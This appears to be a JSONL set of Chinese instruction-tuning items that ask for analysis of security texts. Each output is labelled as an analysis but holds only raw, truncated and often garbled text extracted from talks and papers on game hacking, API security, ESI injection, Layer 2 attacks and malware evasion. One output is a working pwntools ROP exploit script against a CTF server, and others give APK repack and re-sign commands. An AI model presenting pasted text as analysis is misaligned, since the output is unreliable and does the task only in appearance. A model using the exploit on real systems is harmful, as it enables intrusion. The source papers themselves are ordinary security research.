{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack Mobile Games For Fun HITCON 2015 ChienWei Hung (winest) 2 四年前被騙入趨勢當研替 遊戲資歷22年  永遠的β測試玩家 你哪位 3 四年前被騙入趨勢當研替至今 遊戲資歷22年  永遠的β測試玩家 4 來聊聊手機遊戲破解 5 2014年營收 6 Rank 1 2 3 4 5 6 7 8 9 10 from App Annie Rank 10 9 8 7 6 5 4 3 2 1 iOS App Store Taiwan Russia France Germany Canada Australia United Kingdom China Japan United States Google Play Japan United States South Korea Germany Taiwan United Kingdom France Hong Kong Australia Canada LV. 0 7 破解 解鎖 已付費 8 LV. 1 8 LV. 1 限制 Root Memory未加密 程式的驗證很弱  Root檢查  已安裝程式檢查  動作前後數值檢查 LV. 2 Unpack apk  java jar apktool.jar d f <src apk> o <dst folder> Repack apk  java jar apktool.jar b <dst folder>  java jar signapk.jar <pem file> <pk8 file> <unsigned apk> <signed apk> 11 12 Bytecode的好處 13 可以直接看source code  d2jdex2jar f <src apk> o <dst jar>  jdgui <dst jar> 14 LV. 2 限制 沒有被obfuscated 程式沒有檢查checksum 主程式用Java寫 LV. 3 手機遊戲架構 17 簡易數值修改 18 Unpack apk Disassemble到il  ildasm.exe <dll path> /OUT=<il path> /UTF8 修改*.il Assemble回dll  ilasm.exe <il path> /DLL /OUTPUT=<dll path> /RESOURCE=<res path> Repack and sign apk LV. 4 19 .NET Reflector配合Reflexil LV. 5 20 Visual Studio客製化修改 自製Tool調整offset  https://github.com/winest/CILTools 防禦 Obfuscate  Android有Unity也有就是沒人用超爽der 內容加密 合理範圍檢查 適可而止否則兩敗俱傷 XD 兩敗俱傷 XD 兩敗俱傷 XD 大家來研究 22 如果你符合  我講的你都會了  各式Game Engine或iOS專家  願意提供1G RAM以上iOS機種做研究 歡迎來聊聊不一樣的東東 23 Thanks  本人在此特地聲明 本人樂觀開朗身體健康無任何使我困擾之慢性病或心理疾病故絕不可能做出任何看似自殺之行為 本人從無睡眠困擾故不需服用安眠藥本人不酗酒亦不吸毒也絕不會接近下列地點 1. 開放性水域 2. 無救生員之遊泳池 3. 有高壓危險氣體或密閉式未經抽氣處理之地下室蓄水池水桶等 4. 無安全護欄之任何高處 5. 任何施工地點拆政府除外包括製作消波塊之工地 6. 任何以上未提及但為一般人正常不會前往之地點 本人恪遵下列事項 1. 車輛上路前會檢查煞車部件油門線等並會在加油前關閉車輛電源與行動電話 2. 絕不擅搶黃燈闖紅燈 3. 乘坐任何軌道類交通工具一定退到警戒線後一步以上直到車輛停妥 4. 騎乘機車必戴安全帽乘車必繫安全帶 5. 絕不接近任何會放射對人體有立即危害的輻射之場所或設備 6. 颱風天不登山不觀浪不泛舟 本人將儘可能注意電器瓦斯火源水源之使用 本人居住之房屋均使用符合法規之電路電線絕無電線走火之可能也絕未在家中放置過量可燃性氣體或液體 浴室中除該有之照明外不放置任何電器用品並在睡覺前關閉除電燈冰箱電扇外之所有電器開關 本人絕不會與隨機的不明人士起衝突並儘可能保護自我人身安全 所以若各位在看完此聲明之後近期或將來發現本人不再上線請幫我討回公道謝謝", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n应用程序接口API 数据安全研究报告 2020 年 中国信息通信研究院安全研究所 2020 年 7 月 版权声明 本报告版权属于中国信息通信研究院安全研究所并受 法律保护转载摘编或利用其它方式使用本报告文字或者 观点的应注明来源中国信息通信研究院安全研究所 违反上述声明者本院将追究其相关法律责任 前 言 伴随着云计算大数据人工智能等技术的蓬勃发展移动互 联网物联网产业加速创新移动设备持有量不断增加Web 应用 移动应用已融入生产生活的各个领域这一过程中应用程序接口 Application Programming InterfaceAPI作为数据传输流转 的重要通道发挥着举足轻重的作用API 技术不仅帮助企业建立与客 户沟通的桥梁还承担着不同复杂系统环境组织机构之间的数据 交互传输的重任然而在 API 技术带来上述积极作用的同时 与其相关的数据安全问题也日益凸显 近年来国内外曝出多起与 API 相关的数据安全事件严重损 害了相关企业用户的合法权益我国多个行业已出台相关规范性 文件覆盖通信金融交通等诸多领域对 API 安全提出了一定 要求对其技术部署安全管理等进行规范然而当前已研制标准 主要针对特定 API 类型应用场景提出要求尚未全面覆盖 API 数 据安全相关标准规范体系有待完善 本报告围绕近年来 API 安全态势分析梳理了 API 技术面临的 内外部安全风险针对事前事中事后不同阶段的安全需求差 异从 API 安全管理防护手段风险管控等多角度为企业实现高 效灵活的 API 安全实践提出了针对性建议 技术支持 全知科技杭州有限责任公司 联系人 王丹辉 中国信息通信研究院 电子邮件wangdanhui@caict.ac.cn 解伯延 中国信息通信研究院 电子邮件xieboyan@caict.ac.cn 朱通 全知科技杭州有限责任公司 费嫒 全知科技杭州有限责任公司 目 录 一 API 的基本情况..................................................................................................1 一 API 简介............................................................................................... 1 二 API 分类及组成要素........................................................................... 2 1. API 分类.............................................................................................2 2. API 组成要素.....................................................................................3 三 API 安全标准化情况........................................................................... 4 二 近年来 API 安全态势.......................................................................................10 一 Facebook 多起数据泄露事件与 API 有关....................................... 10 二 美国邮政服务 API 漏洞导致用户信息泄露.................................... 11 三 T-Mobile API 漏洞导致用户账号被窃取....................................... 11 四 Twitter 虚假账户利用 API 批量匹配用户信息............................. 12 五 考拉征信非法出售 API 导致个人信息泄露.................................... 12 六 新浪微博用户查询接口被恶意调用导致数据泄露........................ 12 七 微信团队收回小程序\"用户实名信息授权\"接口............................ 13 三 安全风险分析........................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom pwn import * #r = process(\"./rescue\")#, env={\"LD_PRELOAD\":\"./libc.so.6\"}) fread = 0x0000000000076eb0 #system = 0x0000000000047dc0 gadget = 0x47c9a #gadget = 0xd9763 r = remote(\"rescueshell.challs.malice.fr\", 6060) fread = 0x000000000006a460 gadget = 0x41374 RDI = 0x0000000000400a93 # pop rdi ; ret RBP = 0x00000000004006c0 # pop rbp ; ret rop = \"A\" * 0x48 rop += struct.pack(\"<Q\", RBP) rop += struct.pack(\"<Q\", 0x601210 + 0x140) rop += struct.pack(\"<Q\", 0x40099a) r.write(rop) r.recvuntil(\"Password: \") sleep(0.5) p = r.recv(6) p += \"\\x00\" * (8- len(p)) p = struct.unpack(\"<Q\", p)[0] print hex(p) p += gadget - fread print hex(p) rop = \"\\x00\" * 0x48 rop += struct.pack(\"<Q\", p) rop += \"\\x00\" * 0x50 rop += struct.pack(\"<Q\", 0x601208 + 0xd0) rop += struct.pack(\"<Q\", 0x4009e6) r.write(rop) sleep(0.5) r.write(struct.pack(\"<Q\", p)) #rop += struct.pack(\"<Q\", 0x4009b6) #rop += struct.pack(\"<Q\", 0x41414141) open(\"rop\", \"wb\").write(rop) r.interactive()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n软件调试补编 - 1  Copyright  2009 ADVDBG.ORG All Rights Reserved 软件调试补编 作者张银奎 2009 年 1 月 12 日 软件调试补编 - 2  Copyright  2009 ADVDBG.ORG All Rights Reserved 大多数程序员的技术水平不如黑客的主要原因是他们远远不如黑客 那样重视和擅于使用调试技术 软件调试补编 - 3  Copyright  2009 ADVDBG.ORG All Rights Reserved 前 言 总的来说今天的软件很糟糕而且一段时期内还会继续变得更糟原因有 很多关键的是错误观念大行其道聊举数例 写代码很容易不需要那么资深的人于是乎软件白领变蓝领了蓝领 还是大材小用软件民工刚刚好性价比最高 我从来不调试我的程序运行一下没有错误就可以了这是为什么使用 调试器来看时很多软件有那么多明晃晃的问题 XXX 很快呀还可以用它来写操作系统呢当我启动一个应用程序需 要 5 秒钟以上时看着硬盘的灯疯狂的闪动我恨不得快点把它从我的系统中删 掉 抓 BUG 完全是程序员自己的事那么项目延迟了还是程序员自己的事 么 今天的硬盘空间大CPU 速度快内存条便宜软件大一些多用些资 源没关系 事实上没有简单的软件无论是上层的应用程序还是下层的驱动或者系 统程序 软件的特征决定了软件天生就需要像绣花那样精工细作软件是给 CPU 来 运行的让高速的 CPU 在软件编排的指令流上奔跑可谓是系千钧于一发糟糕 的软件在浪费能源也在浪费时间如果套用鲁迅先生说的话那么糟糕的软件 每天都在图财害命 如何才能让软件变得很精细准确无误呢不仔细看一看可以做到么 有些软件可以工作但是有时会出问题糟糕的是出了问题后没有什么办 法来寻找原因在 XXX 做了一年多的开发之后对此深有体会一次我向在 XXX 上工作多年的一个朋友询问在 XXX 上调试主要靠什么方法呢他的 回答颇令人回味靠想 使劲想然后加些 PRINT逐步缩小范围. 多么好的程序员呀 老雷 2009 年元月 软件调试补编 - 4  Copyright  2009 ADVDBG.ORG All Rights Reserved 软件调试书友活动获奖名单 整理和发布这份补编的主要目的是赠送给参加2008软件调试以书会友 活动的朋友们这次活动从 2008 年 6 月 1 日开始截止日期为 2008 年 12 月 31 日从 6 月 11 日 Neilshu 第一个参与到 12 月 31 日的 23 点 47 分 Vito1997 参 与共有 22 位朋友参加了这次活动收到照片大约 100 幅 参与这次活动的 22 位朋友是 Casechen Ccl ckj1234 Coding Dbgsun Flyingdancex grant_fei2003@hotmail.com hnsy777 KernelPanic Mabel Mybios Neilhsu Nightxie Pch s5689412 shamexln speedingboy turboc Vito1997 WANGyu xszhou1997 yfliu 经过博文视点的周老师和软件调试这本书的编辑团队以及作者的认真评 比获奖结果如下 一等奖 一等奖 一等奖 一等奖一名 一名 一名 一名   Neilhsu 奖品为奔腾 4 全录IA32 处理器宗谱The Unabridged Pentium 4: IA32 Processor Genealogy作者签名英文原版 二等奖 二等奖 二等奖 二等奖两名 两名 两名 两名   mybios 和 和 和 和 nightxie 奖品为深入解析 Windows 操作系统 第 4 版 三等奖 三等奖 三等奖 三等奖三名 三名 三名 三名   yfliu   WANGyu 和 和 和 和 shamexln 奖品为Windows 用户态程序高效排错 所有参加活动的朋友都获得纪念奖奖品是电子版本的<软件调试>补编 衷心感谢参加这次活动的所有朋友愿我们的友谊永驻 软件调试补编 - 5  Copyright  2009 ADVDBG.ORG All Rights Reserved 目 录 补编内容 1 错误提示机制之消息框............................................................................................. 9 13.1 MessageBox .........................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Hack.lu CTF 2015 Uczestniczyliśmy (msm, Rev, Shalom, other019, nazywam i pp) w Hack.lu CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). Ogólne wrażenia: - CTF w środku tygodnia = bardzo słaby pomysł bo wszyscy w pracy albo w szkole więc na CTFa zostaje tylko kilka godzin... Opisy zadań po kolei. # Spis treści / Table of contents: * Module Loader 100+10 * PHP Golf 75+70 * Stackstuff 150+80 * Bashful 200+40 * Creative Cheating 150+60 * Checkcheckcheck 150+80 * Perl Golf 75+50 * Teacher's Pinboard 352+100 * Secret Library 200+70 * Grading Board 300+80 * [GuessTheNumber (ppc 150+80)](ppc150_guess_the_number) * GuessTheNumber 150+80 * Salt 200+90 * Dr. Bob 150+80 # Zakończenie Zachęcamy do komentarzy/pytań/czegokolwiek.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2019/2/26 GET来的漏洞 | WooYun知识库 http://www.anquan.us/static/drops/web-7112.html 1/10 GET来的漏洞 呆子不开口 (/author/呆子不开口)  2015/07/15 10:04 0x00 前言 这篇文章主要讲目前互联网上get方法被不规范使用带来的一些安全漏洞其中重点会讲get请求在账号登陆体系中被滥用 的场景和攻击方式 0x01 Get方法的定义 在客户机和服务器之间进行请求-响应时两种最常被用到的方法是GET 和 POST GET - 从指定的资源请求数据 POST - 向指定的资源提交要被处理的数据 GET 方法的查询字符串是在 GET 请求的 URL 中发送的常见的场景是地址栏请求和超链接 0x02 Get请求常见于如下场景中 浏览器地址栏中可见会被别人看到 浏览器历史记录 被云加速的cdn服务商收集proxy 被运营商或网络设备收集重放 在不安全的网络环境中被网络嗅探 用户的收藏夹 http的header的referrer字段中 web服务器日志应用日志 被搜索引擎爬到或者被客户端软件不规范收集 被用户邮件或微信分享出去 各种可能的地方甚至山岗上田野上一个黑客盗取了你的get请求后路过一个山岗时被大灰狼吃掉了U盘掉在 了山岗上 0x03 Get请求的风险 根据HTTP规范GET用于信息获取是安全的和幂等的安全的意思是get请求不会让服务端的资源或状态改变幂等的 意思是无论请求多少次返回的结果都一样都不会对服务端资源有任何副作用 所以从被设计和现实中被使用的场景来看get请求有如下特性 因为是获取资源的请求所以会在客户端缓存端和服务器端等地方到处出现容易泄露被第三方获得 因为是安全和幂等的所以各环节重放get请求时不用顾忌不用提示用户重放post有时浏览器会提示用户是否确定 要重新发送数据 所以get请求的使用应该遵循 (/author/呆 开口) 呆子不开口 ( 呆子不开 (/) (/n ew se nd)  (/w p- logi n.p hp ? acti on =lo go ut& red ire ct_ to= htt p% 3A %2 F% 2F dro ps. wo oy un. org ) 2019/2/26 GET来的漏洞 | WooYun知识库 http://www.anquan.us/static/drops/web-7112.html 2/10 不应有增删改的操作 不应包含敏感信息 当你的实现不符合别人对你的预期就可能产生漏洞如 隐私泄露被csrf漏洞利用账号被盗 0x04 若你非要用get实现增删改 会被重放导致服务端资源状态发生改变 浏览器的重新打开可能会重放请求而不会提示用户 爬虫或安全扫描会重放你的请求 获取到你get请求的各种势力可能会重放此请求如安全厂商搜索引擎神秘力量除了山岗上那个黑客因为他已 经被大灰狼吃掉了 get操作的csrf防护很难实施因为get没有防伪造的需求它的场景不一定配合你的防护referrer信任可能被利用token 可能被偷举个例子一个塑料盒子它本就不是被设计用来存钱的你若非要用它存钱并还要加上一把锁效果肯定 不会好见下面例子 网站允许用户发表第三方链接图片等那么用户构造的csrf请求的referrer是可信域的url可以绕过referrer的防护 存在js端的跳转漏洞跳到第三方同理可以绕过referrer Get请求中防护的token容易被偷原理同上后面的章节会细讲 常见的场景一些使用了mvc框架的程序直接用urlrewrite后的url来实现了增删改等操作 0x06 若你非用get传输敏感信息 互联网上常见的敏感信息举例 隐私信息 http://weibo.com/lvwei 大家可能觉得微博id不算隐私但一旦你的id和某些操作绑定的时候那就算是隐私了 校验信息 https://mp.weixin.qq.com/cgi-bin/home?t=home/index&lang=zh_CN&token=371767643 这是微博公众平台管理后台的首页首页url里会包含csrf防护的token 认证信息 http://XXX.XXXXXX.XXX/index.php?ticket=***************** http://XXX.XXXXXX.XXX/index.php?gsid=****************** 很多登录认证如单点登录绑定第三方账号登录等会用get请求来完成登录 如果你的get请求中包含如上一些信息那么你的敏感信息将会被偷被泄露然后你会被搞 0x07 敏感信息泄露举例 (/) (/n ew se nd)  (/w p- logi n.p hp ? ac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPentesterAcademy.co m/ PentesterAcademy.com VoIPShark:+Open+Source+VoIP+Analysis+ Platform+ Nishant/Sharma/ Jeswin+Mathai+ Ashish+Bhangale+ PentesterAcademy.com+&+AttackDefense.com+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ About+Us+ Me,/Nishant/Sharma/  R&D+Manager+and+Lead+Trainer,+Pentester+Academy+  Firmware+developer,+Enterprise+WiFi+APs+and+WIPS+Sensors+  Masters+degree+in+Infosec+  Published+research+at+Blackhat+US/Asia,+DEF+CON+USA+and+other+venues+ + Co-authors+  Ashish/Bhangale,+Sr.+Security+Researcher+  Jeswin/Mathai,+Security+Researcher+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ PentesterAcademy.com+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ AttackDefense.com+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ Talk+Overview+  VoIP+Basics+  SIP,+RTP+  Secure:+TLS,+SRTP++ +  Recovering/Decrypting+VoIP+Calls+ +  Current+open+source+tools+and+issues+ +  VoIPShark+  Architecture+and+Internals+  Analyzing+VoIP+Traffic+  Recovering+Calls+  Detecting+Attacks+Passively+  Demo+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ VoIP+Telephony+  Signalling+++Media++ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ Signalling+Protocols++ SIP/(Session/Initiation/Protocol)+  Developed+by+the+IETF+  Replacement+for+the+desk+phones+and+PSTN+(Public+Switched+Telephone+Network)+ + H.323+  Created+by+the+ITU-T+  Focused+on+videoconferencing+but+also+used+for+voice+calls+ + SCCP/(Skinny)+  Cisco+proprietary+protocol+used+for+line-side+control+of+phones+ PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ Session+Initiation+Protocol+  Text-based+protocol+  Applications++  Calls+(audio,+video)+using+other+media+steams+like+RTP+  Text+messages+using+SIP+Message+method+  Works+with+other+protocols+  Session+Description+Protocol+(SDP)+to+define+with+media+negotiation+and+setup+  Can+operate+over+TCP,+UDP+or+SCTP+(Stream+Control+Transmission+", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEdge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking By Louis Dion-Marcil GoSecure Edge Side Includes (ESI) what is it? Edge Side Includes (ESI) what is it? Edge Side Includes (ESI) what is it? The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27C 23C 31C Edge Side Includes (ESI) what is it? The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27C 23C 31C Variable Fragments Static Fragment Edge Side Includes (ESI) what is it?  Adds fragmentation to caching  App Server send fragment markers in HTTP responses <esi:[action] attr=\"val\" />  ESI tags are parsed by the HTTP surrogate (load balancer, proxy)  Most engines require specific App Server HTTP Headers ESI Features & Syntax  Include page-1.html: <html> <p>This is page 1!</p> <esi:include src=\"/page-2.html\" /> </html> page-2.html: <p>This is page 2!</p> ESI Features & Syntax  Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html> ESI Flow (cache miss) ESI Flow (cache miss) ①/1.html ESI Flow (cache miss) ①/1.html ②/1.html ESI Flow (cache miss) ①/1.html 1.html + ESI ②/1.html ③ ESI Flow (cache miss) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed ESI Flow (cache miss) ①/1.html 1.html + ESI ②/1.html ③ ④/2.html ESI tags processed ESI Flow (cache miss) ①/1.html 1.html + ESI ②/1.html ③ ④/2.html 2.html ⑤ ESI tags processed ESI Flow (cache miss) ①/1.html 1.html + ESI ②/1.html ③ ④/2.html 2.html ⑤ ⑥ + ESI tags processed ESI Features & Syntax  Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> ESI Features & Syntax  Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT)  Mozilla/5.0 (X11;[] $(QUERY_STRING)  city=Montreal&format=C $(HTTP_COOKIE)  _ga=[]&__utma=[] ESI Attacks  ESI tags are sent by the application server  How can the Edge server tell which tags are legitimate?  It cant. ESI Injection <p> City: <?= $_GET['city'] ?> </p> ESI Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnintended Consequences: Four Years under the DMCA 1. Executive Summary Since they were enacted in 1998, the anti- circumvention provisions of the Digital Millennium Copyright Act (DMCA), codified in section 1201 of the Copyright Act, have not been used as Congress envisioned. Congress meant to stop copyright pirates from defeating anti-piracy protections added to copyrighted works, and to ban black box devices intended for that purpose.1 In practice, the anti-circumvention provisions have been used to stifle a wide array of legitimate activities, rather than to stop copyright piracy. As a result, the DMCA has developed into a serious threat to three important public policy priorities: Section 1201 Chills Free Expression and Scientific Research. Experience with section 1201 demonstrates that it is being used to stifle free speech and scientific research. The lawsuit against 2600 magazine, threats against Princeton Professor Edward Feltens team of researchers, and prosecution of Russian programmer Dmitry Sklyarov have chilled the legitimate activities of journalists, publishers, scientists, students, programmers, and members of the public. Section 1201 Jeopardizes Fair Use. By banning all acts of circumvention, and all technologies and tools that can be used for circumvention, section 1201 grants to copyright owners the power to unilaterally eliminate the publics fair use rights. Already, the music industry has begun deploying copy-protected CDs that promise to curtail consumers ability to make legitimate, personal copies of music they have purchased. Section 1201 Impedes Competition and Innovation. Rather than focusing on pirates, many copyright owners have chosen to use the DMCA to hinder their legitimate competitors. For example, Sony has invoked section 1201 to protect their monopoly on Playstation video game consoles, as well as their regionalization system limiting users in one country from playing games legitimately purchased in another. This document collects", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### ZIP文件结构 `ZIP` 文件主要由三部分构成分别为 | 压缩源文件数据区 | 核心目录 | 目录结束 | | ----------------------------------------------- | ----------------- | ------------------------------- | | local file header + file data + data descriptor | central directory | end of central directory record | - 压缩源文件数据区中每一个压缩的源文件或目录都是一条记录其中 - `local file header` 文件头用于标识该文件的开始记录了该压缩文件的信息这里的文件头标识由固定值 `50 4B 03 04` 开头也是 `ZIP` 的文件头的重要标志 - `file data` 文件数据记录了相应压缩文件的数据 - `data descriptor` 数据描述符用于标识该文件压缩结束该结构只有在相应的 `local file header` 中通用标记字段的第 `3 bit` 设为 `1` 时才会出现紧接在压缩文件源数据后 - `Central directory` 核心目录 - 记录了压缩文件的目录信息在这个数据区中每一条纪录对应在压缩源文件数据区中的一条数据 | Offset | Bytes | Description | 译 | | ------ | ----- | ---------------------------------------------------- | --------------------------------------- | | 0 | 4 | Central directory file header signature = 0x02014b50 | 核心目录文件 header标识 =0x02014b50 | | 4 | 2 | Version made by | 压缩所用的 pkware 版本 | | 6 | 2 | Version needed to extract (minimum) | 解压所需 pkware 的最低版本 | | 8 | 2 | General purpose bit flag | 通用位标记伪加密 | | 10 | 2 | Compression method | 压缩方法 | | 12 | 2 | File last modification time | 文件最后修改时间 | | 14 | 2 | File last modification date | 文件最后修改日期 | | 16 | 4 | CRC-32 | CRC-32 校验码 | | 20 | 4 | Compressed size | 压缩后的大小 | | 24 | 4 | Uncompressed size | 未压缩的大小 | | 28 | 2 | File name length (n) | 文件名长度 | | 30 | 2 | Extra field length (m) | 扩展域长度 | | 32 | 2 | File comment length (k) | 文件注释长度 | | 34 | 2 | Disk number where file starts | 文件开始位置的磁盘编号 | | 36 | 2 | Internal file attributes | 内部文件属性 | | 38 | 4 | External file attributes | 外部文件属性 | | 42 | 4 | relative offset of local header | 本地文件头的相对位移 | | 46 | n | File name | 目录文件名 | | 46+n | m | Extra field | 扩展域 | | 46+n+m | k | File comment | 文件注释内容 | - `End of central directory record(EOCD)` 目录结束标识 - 目录结束标识存在于整个归档包的结尾用于标记压缩的目录数据的结束每个压缩文件必须有且只有一个 `EOCD` 记录 更加详细参见 [官方文档](https://pkware.cachefly.net/webdocs/APPNOTE/APPNOTE-6.2.0.txt) ### ZIP爆破攻击方式 这里主要介绍两款爆破使用的工具 - `Windows`下的神器 [ARCHPR](http://www.downcc.com/soft/130539.html) ![](./", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKim Jong Kim Jong--il and me: il and me: How to build a cyber army to attack the How to build a cyber army to attack the U.S. U.S. Charlie Miller Charlie Miller Independent Security Evaluators Independent Security Evaluators cmiller@securityevaluators.com cmiller@securityevaluators.com Overview Overview About me About me Some background material Some background material Key strategies Key strategies Cyberwar potential attacks Cyberwar potential attacks Cyberarmy tasks Cyberarmy tasks Possible defenses Possible defenses Layout of army Layout of army Timeline of preparation and attack Timeline of preparation and attack Conclusions and lessons learned Conclusions and lessons learned About this talk About this talk Originally given at Conference for Cyber Conflict, at Originally given at Conference for Cyber Conflict, at the NATO Cooperative Cyber Defense Centre of the NATO Cooperative Cyber Defense Centre of Excellence Excellence The audience was some technical, some policy types The audience was some technical, some policy types This version is a little more technical (and hopefully This version is a little more technical (and hopefully funny) funny) Who I am Who I am PhD in Mathematics, University of Notre Dame PhD in Mathematics, University of Notre Dame 1 year, Security Architect, a Financial Services firm 1 year, Security Architect, a Financial Services firm 5 years, NSA Global Network Exploitation Analyst 5 years, NSA Global Network Exploitation Analyst 4 years, consultant for Independent Security Evaluators 4 years, consultant for Independent Security Evaluators Application and network penetration testing Application and network penetration testing Project planning and scoping Project planning and scoping First remote exploits against iPhone, G1 Android phone First remote exploits against iPhone, G1 Android phone 3 time winner Pwn2Own competition 3 time winner Pwn2Own competition My career as a govie My career as a govie Bullets from my NSA approved resume Bulle", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n> Nicolas FISCHBACH IP Engineering Manager - COLT Telecom nico@securite.org - http://www.securite.org/nico/ > Sébastien LACOSTE-SERIS IP R&D Manager, Security Officer - COLT Telecom kaneda@securite.org - http://www.securite.org/kaneda/ version 1.0 Layer 2, routing protocols, router security & forensics  2002 Sécurité.Org 2 Agenda  Layer 2 protocols and attacks > ARP > STP, CDP, DTP, etc. > VLANs > HSRP/VRRP  Router Security > Configuration hardening > Integrity checking > Forensics  2002 Sécurité.Org 3 Protocol attacks  Well known (not to say old) attacks > ARP cache/CAM table poisoning, gratuitous ARP messages and ARP/{DHCP,BOOTP} spoofing > Tools : dsniff, hunt, ARP0c, taranis, etc.  New (not so old) attacks > HSRP/VRRP spoofing > STP/VTP/DTP attacks > VLAN jumping/hoping  Future (to come) attacks ? > Advanced routing protocols attacks (eg. IRPAS) > Rootkits and Loadable Kernel Modules  2002 Sécurité.Org 4 Layer 2 protocols  Layer 2 protocols and traffic > ARP - Address Resolution Protocol > CDP - Cisco Discovery Protocol > VLAN - Virtual LAN > STP - Spanning Tree > {D/V}TP- Dynamic, VLAN Trunking Protocol > Unicast, Broadcast and Multicast addressing and traffic  2002 Sécurité.Org 5  STP (Spanning Tree Protocol) > STP prevents loops in the Ethernet network topology > Redundant data path forced into standby (blocked) state > STP enabled on all ports by default > No traffic forwarding during STP processing Protocols : STP (1) Boot-up initialisation Blocking state Listening state Disabled state Forwarding state Learning state  2002 Sécurité.Org 6  STP (Spanning Tree Protocol) > 1. Root Switch Election > 2. STP processing blocks redundant path Protocols : STP (2) Blocked Root Switch  2002 Sécurité.Org 7 Protocols : STP (3)  Network Traffic Interception > Must have physical connection to 2 switches > Transparent traffic interception Root Switch Blocked Blocked  2002 Sécurité.Org 8 Protocols : STP (4)  Other STP attacks > CAM table poisoning > DoS - Force infinite elec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOperating System Fingerprinting for Virtual Machines Nguyen Anh Quynh Email: aquynh@gmail.com Abstract In computer security field, Operating System fingerprint- ing (OSF) is the process of identifying the OS variant and version. OSF is considered an important stage to decide security policy enforced on protected Virtual Machine (VM). OSF is also the first step of VM introspection pro- cess. Unfortunately, current OSF techniques suffer many problems, such as: they fail badly against modern Oper- ating System (OS), they are slow, and only support lim- ited OS-es and hypervisors. This paper analyzes the drawbacks of current OSF ap- proaches against VM, then introduces a novel method named UFO to fingerprint OS running inside VM. Our solution fixes all the above problems: Firstly, it can rec- ognize all the available OS variants and (in lots of cases) exact OS versions with excellent accuracy, regardless of OS tweaking. Secondly, UFO is extremely fast. Last but not least, it is hypervisor-independent: we proved that by implementing UFO on Xen. 1 Introduction OSF is the process of understanding which OS is running on a particular machine. OSF is helpful for the admin- istrators to properly decide the security policy to protect their systems. For example, assume that we want to pro- tect this machine against the Conficker worm [10]. If we know that this machine runs Linux, which is not ex- ploitable by Conficker, we do not need secure it. But if that machine runs a specific version of Microsoft Win- dows, we have to look more closely: in case the OS is Windows 7, we can safely ignore the problem, because Conficker does not affect this Windows edition. But if the OS is Windows XP SP3, which can be remotely com- promised by this worm, we should put a firewall around the machine to prevent the attack, and possibly IDS/IPS must be deployed on the network path to monitor the threat. One more motivation for our research is that knowing the VMs OS is important for memory introspection on ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 3 Understanding and countering malwares evasion and self-defence https://github.com/hasherezade/malware_training_vol1 Introduction Malware: Evasion and self-defense Malware: Evasion and self-defense  In order to carry on its mission, malware must remain undetected  Malware needs to defend itself from:  Antimalware products (on the victim machine)  Analysis tools and sandboxes (on a researchers machine) Malware: Evasion and self-defense  Approaches:  Passive:  obfuscation (at the level of: code, control flow, strings, used APIs)  Active:  environment fingerprinting, detection of the analysis tools and:  interference in them (i.e. uninstalling AV products, unhooking hooks)  altering own behavior (deploying a decoy, or terminating execution) The passive approach: obfuscation  Related with the way code is designed: i.e. using exception handlers to switch between various code blocks, using dynamically loaded functions, string obfuscation, polymorphic code, etc  Added at the compilation level: i.e. adding junk instructions, complicating control flow (example: movfuscator)  Added at linking level: atypical PE header, atypical sections alignment  Post-compilation: using protectors  Depending on the degree with the obfuscation, may be difficult to defeat Deobfuscation  Approaches:  Dynamic:  Code intrumentation, tracing: allows to quickly find out what the code does, without reconstructing all details of the implementation  quick and generic, but we may miss the parts that havent been executed during the test runs  Static:  analysis of the code and cleaning/resolving the obfuscated parts, reconstruction of the control flow  may be more accurate, but laborious, and requires different approach depending on a particular case The active approach: fingerprinting  Mostly related with the way code is designed: additional functions doing enviromnent fingerpriting to find artefacts indicating analysis  Post-compilation: using protectors with added antidebug/anti-VM layer, unde", "category": "text_analysis", "source": "security_papers"}
